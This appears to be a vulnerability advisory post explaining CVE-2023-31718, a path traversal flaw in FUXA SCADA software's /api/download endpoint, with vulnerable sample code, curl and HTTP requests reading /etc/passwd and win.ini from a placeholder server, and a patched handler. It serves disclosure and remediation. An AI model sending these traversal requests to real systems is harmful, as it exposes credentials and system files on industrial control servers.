CVE CyberSecurity Database News

CVE-2023-31718 - Local File Inclusion in FUXA <= 1.1.12 via /api/download Endpoint

Poster -

FUXA is an open-source web-based SCADA (Supervisory Control and Data Acquisition) software written in Node.js, widely used for industrial process monitoring. In early 2023, a major security flaw was discovered—CVE-2023-31718—that enables attackers to read files from the server using FUXA’s /api/download endpoint. This post explains how the vulnerability works, demonstrates exploitation, and gives advice on how to secure affected systems.

What is CVE-2023-31718?

CVE-2023-31718 is a local file inclusion (LFI) vulnerability that was found in FUXA version 1.1.12 and earlier. By abusing the /api/download endpoint, attackers are able to trick the application into sending them files from anywhere on the server, including sensitive files like /etc/passwd, credentials, or environment files.

Vulnerable Code Explanation

The vulnerable code is in the route handling /api/download. It directly uses the user-supplied file path to access the file system, without proper checks or sanitization.

Here’s a simplified version of what the vulnerable code looks like

// In routes/api/files.js (example)

// User provides 'filename' query parameter
app.get('/api/download', (req, res) => {
  const filename = req.query.filename;

  // VULNERABLE: No validation or sanitization!
  res.download(filename);
});

With this, an attacker can simply call /api/download?filename=../../../../etc/passwd to fetch sensitive files.

Suppose FUXA is running at http://victim-server:1881. The attacker sends

GET /api/download?filename=../../../../etc/passwd HTTP/1.1
Host: victim-server:1881

With curl

curl "http://victim-server:1881/api/download?filename=../../../../etc/passwd"

This will return the contents of /etc/passwd, proving the attack works.

For Windows targets

curl "http://victim-server:1881/api/download?filename=../../../../windows/win.ini"

Testing It Yourself (Lab Setup)

1. Download and run FUXA 1.1.12 or earlier from https://github.com/frangoteam/FUXA/releases.

Mitigation and Fix

The vendor fixed this issue in version 1.1.13. Update FUXA to the latest version.

Add strict validation to limit downloads to an upload directory

const path = require('path');
const UPLOAD_DIR = path.resolve(__dirname, 'uploads');

app.get('/api/download', (req, res) => {
  const filename = req.query.filename;
  const safePath = path.resolve(UPLOAD_DIR, filename);

  // Ensure the requested file is inside the upload directory
  if (!safePath.startsWith(UPLOAD_DIR)) {
    res.status(400).send('Invalid file path');
    return;
  }

  res.download(safePath);
});

References

- CVE-2023-31718 at NIST
- GitHub Issue Report
- FUXA Releases

Conclusion

FUXA’s file download feature in versions 1.1.12 and below suffers from a critical LFI vulnerability (CVE-2023-31718). Any exposed instance is at serious risk, and admins must update immediately. Don’t expose vulnerable FUXA deployments to untrusted networks. Always sanitize user inputs and restrict file access on the server side to stay safe.

If you’re using FUXA—patch now or risk being compromised.

*This post is original content written in simple language to explain the CVE-2023-31718 vulnerability for sysadmins, engineers, and security enthusiasts.*

Timeline

Published on: 09/22/2023 00:15:00 UTC
Last modified on: 09/25/2023 16:43:00 UTC